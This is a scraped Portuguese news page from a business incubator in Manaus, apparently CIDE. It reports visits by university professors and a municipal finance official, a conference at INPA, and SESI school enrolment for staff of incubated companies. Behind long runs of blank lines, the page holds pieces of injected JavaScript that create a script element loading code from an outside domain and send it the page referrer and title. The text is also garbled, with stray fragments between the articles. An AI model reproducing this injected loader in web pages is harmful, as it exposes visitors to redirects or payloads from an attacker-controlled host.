Professores da UFAM buscam troca de conhecimentos no CIDE

Professores visitam empresa de licores.
Professores visitam empresa de licores.

 

 

Professores da Universidade Federal do Amazonas (UFAM), dos departamentos de Engenharia Química e de Administração, realizaram uma visita, em novembro, ao Centro de Incubação e Desenvolvimento Empresarial (CIDE), com o objetivo de fazer possíveis parcerias para 2017, nas áreas de Pesquisa, Liderança, Empreendedorismo, Biotecnologia e Química.

 

Conforme a professora de Administração, Fabiola Meneguete, no CIDE, os estudantes podem entender como funciona os casos de liderança, de empreendedorismo, a gestão de uma empresa incubada. “Gostaríamos que os estudantes ouvissem e aprendessem, in loco, como funciona uma incubadora de empresas e o que essas empresas estão fazendo na área de Inovação”, disse.

 

Para a professora Yanne Gurgel, do departamento de Engenharia Química da UFAM, as parcerias ajudam na troca de experiências e conhecimentos. “É importante envolver os alunos nesse processo de incubação, inovação e interação, para que eles possam buscar soluções para novos desafios que vão surgir no desenvolvimento de novos produtos, complementando a formação deles”, conta, ressaltando que muitas empresas instaladas no CIDE, desenvolvem atividades relacionadas com a Engenharia Química.

 

O diretor executivo do CIDE, José Barbosa Grosso, comentou que as empresas no CIDE, podem ajudar na formação dos futuros profissionais. “O conhecimento dos empreendedores e profissionais instalados aqui, pode complementar os conhecimentos dos estudantes e vice-versa. Vamos esperar novos contatos para firmar as possíveis parcerias”, conclui.

 

Ao terminar as reuniões com o diretor executivo da incubadora, os professores visitaram algumas empresas de setores relacionados às áreas estudadas na universidade e conversaram com os proprietários.

Professores da Ufam conversam com o diretor executivo, José Barbosa Grosso.
Professores da Ufam conversam com o diretor executivo, José Barbosa Grosso.

 

 

Professores em empresa de temperos regionais.
Professores em empresa de temperos regionais.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

CIDE participa de Conferência no INPA

Conferência reúne representantes de incubadoras de empresas e professores
Conferência reúne representantes de incubadoras de empresas e professores

 

 

Parte da equipe de administração do Centro de Incubação e Desenvolvimento Empresarial (CIDE) participou da 2ª Conferência sobre Processos Inovativos na Amazônia, evento realizado pelo Instituto Nacional de Pesquisas da Amazônia (Inpa/MCTIC), por meio da Coordenação de Extensão Tecnológica e Inovação (Ceti), para compartilhar conhecimentos na área de inovação e promover ações de empreendedorismo.

 

As palestras do evento aconteceram no Auditório do Bosque da Ciência, no próprio INPA em parceria com o instituto Leônidas e Maria Deane (ILDM/Fiocruz). “Compartilhamos e ouvimos sobre conhecimentos tecnológicos, empreendedorismo, pesquisas, produtos, transferência de tecnologia, propriedade intelectual, etc. Tudo isso, ajuda a capacitar as pessoas e a promover novas ações”, diz a funcionária do CIDE, Rosália Padilha.

 

O objetivo do evento, segundo a coordenadora da Ceti, Noélia Falcão, foi compartilhar e disseminar conhecimentos.

A representante do CIDE, Rosália Padilha (à direita) participa do evento.
A representante do CIDE, Rosália Padilha (à direita) participa do evento.

As representantes do CIDE, Rosália e Rita, no evento do INPA.
As representantes do CIDE, Rosália e Rita, no evento do INPA.

 

Inp

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

var d=document;var s=d.createElement(‘script’);

Funcionários de empresas incubadas no CIDE fazem matrícula para aulas

O pedagogo do SESI, Raimundo Jacaúna, faz entrevistas com os matriculados, para conhecer as dificuldades escolares de cada candidato.
O pedagogo do SESI, Raimundo Jacaúna, faz entrevistas com os matriculados, para conhecer as dificuldades escolares de cada candidato.

O Serviço Social da Indústria (SESI/AM) e o Centro de Incubação e Desenvolvimento Empresarial (CIDE) colocaram em prática, no dia 20, as matrículas para a educação escolar de funcionários das empresas instaladas na incubadora. A parceria visa diversas atividades, entre as quais está a conclusão do Ensino Fundamental aos colaboradores dos empreendimentos.

As aulas vão começar na primeira semana de março e serão adequadas às necessidades de cada estudante. “As aulas acontecerão no próprio CIDE, depois das atividades nas empresas, em uma sala preparada para eles e onde os profissionais do SESI darão as aulas. Para nós, é importante que os matriculados tenham a oportunidade de concluir sua formação educacional”, disse o diretor executivo do CIDE, José Barbosa Grosso.

A previsão é de que 30 colaboradores participem da primeira turma e recebam o uniforme escolar.

O pedagogo, Raimundo Jacaúna, conversa com o candidato, na hora da matrícula escolar.
O pedagogo, Raimundo Jacaúna, conversa com o candidato, na hora da matrícula escolar.

SEMEF procura no CIDE possíveis parcerias

semefnoticia

Com o objetivo de fazer parcerias na área de Tecnologia e Sistemas Informatizados, o subsecretário de Tecnologia da Informação da Secretaria Municipal de Finanças (SEMEF), Eudo Assis, esteve no Centro de Incubação e Desenvolvimento Empresarial (CIDE) para conhecer os trabalhos das empresas de base tecnológica que estão instaladas na incubadora.

Acompanhado do diretor executivo da instituição, José Cunha Barbosa Grosso, o subsecretário conversou com os empresários incubados. “Fizemos um levantamento na Semef e concluímos que para dar mais modernidade e segurança nos serviços da secretaria, precisamos de mais sistemas informatizados. Fizemos também, uma pesquisa que mostrou que há no mercado local, empresas capazes de atender essa demanda. Por isso, decidimos fazer uma visita ao Cide”, diz Eudo Assis.

Para o diretor executivo do CIDE, as empresas de tecnologia incubadas no Cide possuem profissionais e produtos capazes de desenvolver sistemas de informática para auxiliar as secretarias. “Ficamos felizes com a visita do sub-secretário e esperamos que a Semef encontre nas empresas incubadas de tecnologia o sistema de informática que eles estão buscando”, conclui José Barbosa Grosso.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;